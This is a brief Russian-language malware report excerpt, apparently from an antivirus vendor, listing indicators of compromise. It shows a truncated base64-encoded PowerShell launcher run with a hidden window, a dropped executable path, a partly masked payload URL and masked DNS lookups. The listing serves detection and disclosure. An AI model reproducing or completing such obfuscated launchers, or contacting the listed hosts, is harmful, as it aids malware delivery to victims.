Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD cwBFAHQALQBJAHQARQBtACAAdgBhAFIAaQBBAEIAbABFADoAaQAzADkAMgA0ADYAIAAoACAAWwB0AHkAUABlAF0AKAAnAFMAJwArACcAeQBTAHQAJwArACcARQBtAC4AaQBPAC4AZABJAHIAZQBDAFQAbwAnACsAJwByAHkAJw...
- %HOMEPATH%\mt6f22h\xxkjef9\utqcjq.exe
- http://da####harmajobs.com/cgi-bin/CyCdO/
- DNS ASK ro##ie.in
- DNS ASK en######bconsulting.co.za
- DNS ASK gr####ges.org.my
- DNS ASK da####harmajobs.com
- DNS ASK co#####aladvance.com
- DNS ASK ro###night.in
- DNS ASK gy###scle.tk
- '%HOMEPATH%\mt6f22h\xxkjef9\utqcjq.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD cwBFAHQALQBJAHQARQBtACAAdgBhAFIAaQBBAEIAbABFADoAaQAzADkAMgA0ADYAIAAoACAAWwB0AHkAUABlAF0AKAAnAFMAJwArACcAeQBTAHQAJwArACcARQBtAC4AaQBPAC4AZABJAHIAZQBDAFQAbwAnACsAJwByAHkAJw...' (со скрытым окном)